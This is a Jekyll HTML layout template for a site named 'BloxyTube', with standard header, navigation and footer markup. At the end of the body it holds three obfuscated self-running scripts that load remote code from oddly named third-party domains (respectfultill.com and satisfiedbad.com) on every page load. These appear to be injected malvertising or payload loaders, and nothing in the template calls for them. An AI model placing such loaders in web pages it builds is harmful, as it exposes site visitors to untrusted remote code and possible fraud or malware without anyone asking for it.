<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>{{ page.title | default: "BloxyTube" }}</title>
  <link rel="stylesheet" href="{{ "/assets/css/style.css" | relative_url }}">
 
</head>
<body>
  <header>
    <h1>{{ site.title | default: "BloxyTube" }}</h1>
    <nav>
      <ul>
        <li><a href="{{ "/" | relative_url }}">Home</a></li>
        <li><a href="{{ "/about" | relative_url }}">About</a></li>
        <li><a href="{{ "/contact" | relative_url }}">Contact</a></li>
      </ul>
    </nav>
  </header>

  <main>
    

    {{ content }}
  </main>

  <footer>
    <p>&copy; {{ site.time | date: "%Y" }} {{ site.title | default: "BloxyTube" }}</p>
  </footer>

  <script>
(function(rkpsk){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = rkpsk || {};
s.src = "\/\/respectfultill.com\/b-XxVfsjd.Golx0\/YcWqcC\/GeXmf9PuEZgU\/lTkQPeTiYe2bMsz\/M\/yANTDdIbtINgjJY\/z\/M_zdIh0_M\/wL";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>
<script>
(function(owjty){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = owjty || {};
s.src = "\/\/satisfiedbad.com\/cpDB9F6.by2_5LlwSpWLQ\/9fNejtYYzDMkzdIv0mN\/i\/0c2JN\/jXMizoMcjMQJ3U";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>
<script>
(function(ypwx){
var d = document,
    s = d.createElement('script'),
    l = d.scripts[d.scripts.length - 1];
s.settings = ypwx || {};
s.src = "\/\/respectfultill.com\/b\/X.VosNdKG\/lt0VYzWwcZ\/HeVmC9vuqZaUAlOktPDT\/YG2\/MAztMNyJNnDXg\/tuNHj\/YczCMMz_Ig0\/O\/QV";
s.async = true;
s.referrerPolicy = 'no-referrer-when-downgrade';
l.parentNode.insertBefore(s, l);
})({})
</script>
</body>
</html>